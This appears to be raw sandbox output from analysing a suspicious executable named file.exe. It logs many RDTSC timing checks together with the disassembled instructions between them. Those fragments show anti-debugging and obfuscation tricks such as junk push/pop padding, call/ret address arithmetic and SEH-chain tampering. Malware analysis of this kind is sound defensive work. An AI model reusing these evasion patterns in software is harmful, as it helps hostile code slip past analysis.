Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74A0C second address: F74A32 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B9132D6B1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74A32 second address: F74A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC8F9 second address: FCC8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC8FD second address: FCC901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC901 second address: FCC90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC90B second address: FCC90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC90F second address: FCC937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B9132D69Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD1343 second address: FD1348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD1348 second address: FD13C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B9132D698h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4B9132D6A2h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F4B9132D698h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movzx ebx, di 0x00000038 mov edi, dword ptr [ebp+122D2AE8h] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F4B9132D698h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F4B9132D696h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE680 second address: FCE684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD13C3 second address: FD13C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD13C9 second address: FD13CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD444F second address: FD4455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4455 second address: FD449B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F4B90BE6226h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 mov ebx, dword ptr [ebp+122D2CF0h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F4B90BE6228h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 clc 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3737 second address: FD373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD54E4 second address: FD54EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD54EE second address: FD556A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F4B9132D698h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 cld 0x00000027 sbb ecx, 18F931C8h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2C00h] 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 jne 00007F4B9132D69Ch 0x0000003e je 00007F4B9132D6AAh 0x00000044 jmp 00007F4B9132D6A4h 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d jmp 00007F4B9132D6A4h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6514 second address: FD6518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD73C0 second address: FD73C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD73C4 second address: FD7441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jns 00007F4B90BE6229h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F4B90BE6228h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4B90BE6228h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 jmp 00007F4B90BE6239h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD67D5 second address: FD67D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD7441 second address: FD7447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD820A second address: FD820E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD756E second address: FD759F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6232h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD759F second address: FD75A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD75A5 second address: FD75A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD8346 second address: FD834A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD834A second address: FD8362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F4B90BE622Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDA2EC second address: FDA32E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B9132D69Ch 0x00000008 jns 00007F4B9132D696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 or di, 26A2h 0x00000018 push 00000000h 0x0000001a jmp 00007F4B9132D69Ch 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F4B9132D696h 0x00000029 jmp 00007F4B9132D6A1h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB30A second address: FDB310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB310 second address: FDB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD94B6 second address: FD94BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD94BA second address: FD9556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F4B9132D6A0h 0x0000000f nop 0x00000010 jmp 00007F4B9132D6A7h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, dword ptr [ebp+122D28FCh] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F4B9132D698h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov bx, di 0x00000046 mov eax, dword ptr [ebp+122D04C9h] 0x0000004c mov bl, cl 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F4B9132D698h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 0000001Bh 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a push eax 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC1FE second address: FDC265 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6228h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4B90BE6228h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F4B90BE6228h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jmp 00007F4B90BE622Ch 0x0000004a push 00000000h 0x0000004c mov di, ax 0x0000004f push eax 0x00000050 push ecx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD296 second address: FDD315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F4B9132D6A2h 0x0000000f pushad 0x00000010 jg 00007F4B9132D696h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b call 00007F4B9132D6A3h 0x00000020 push edi 0x00000021 pop edi 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 movzx edi, si 0x00000028 push 00000000h 0x0000002a call 00007F4B9132D6A9h 0x0000002f jmp 00007F4B9132D6A1h 0x00000034 pop edi 0x00000035 mov di, si 0x00000038 push eax 0x00000039 jg 00007F4B9132D6A0h 0x0000003f pushad 0x00000040 push edx 0x00000041 pop edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC3CA second address: FDC3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4B90BE6226h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE37D second address: FDE3F8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F4B9132D698h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D3526h] 0x0000002c push 00000000h 0x0000002e mov edi, 607ABBACh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4B9132D698h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, 8622h 0x00000053 xchg eax, esi 0x00000054 jg 00007F4B9132D6A4h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F4B9132D69Bh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD466 second address: FDD46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD53E second address: FDD542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD542 second address: FDD550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4B90BE622Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD550 second address: FDD566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D69Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE5FD second address: FDE60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 je 00007F4B90BE6234h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE60F second address: FDE613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF43A second address: FDF451 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F4B90BE6238h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF451 second address: FDF455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF455 second address: FDF51A instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jo 00007F4B90BE622Bh 0x00000011 mov ebx, 6300E352h 0x00000016 mov dword ptr [ebp+122D1DD8h], ebx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov edi, 0B0CE6FCh 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F4B90BE6228h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov eax, dword ptr [ebp+122D09A1h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F4B90BE6228h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 jmp 00007F4B90BE622Ah 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007F4B90BE6238h 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 jmp 00007F4B90BE6237h 0x0000007e jl 00007F4B90BE6226h 0x00000084 popad 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF51A second address: FDF524 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE046D second address: FE0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0471 second address: FE0477 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0477 second address: FE047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE047D second address: FE0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0481 second address: FE0485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9150 second address: FE9161 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE92E8 second address: FE92ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE948E second address: FE94CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4B9132D6A7h 0x00000010 pushad 0x00000011 jmp 00007F4B9132D69Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE94CF second address: FE94D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEEFEC second address: FEF013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F4B9132D6A7h 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F4B9132D6A4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF013 second address: FEF019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF019 second address: FEF028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF028 second address: FEF02E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF02E second address: FEF061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F4B9132D6A1h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF061 second address: FEF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEF0CE second address: FEF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5F36 second address: FF5F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5F4D second address: FF5F5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F4B9132D69Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF4B18 second address: FF4B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF4B1C second address: FF4B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF52AE second address: FF52D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4B90BE6226h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B90BE6234h 0x00000012 jns 00007F4B90BE6228h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF52D7 second address: FF52FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D69Ch 0x00000008 jmp 00007F4B9132D6A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF52FF second address: FF5321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4B90BE6238h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5473 second address: FF5485 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4B9132D69Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF55CE second address: FF55D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF55D2 second address: FF55DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF55DC second address: FF55EC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4B90BE6232h 0x00000008 je 00007F4B90BE6226h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF58A8 second address: FF58C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF58C0 second address: FF58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B90BE622Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4B90BE622Fh 0x00000014 rdtsc
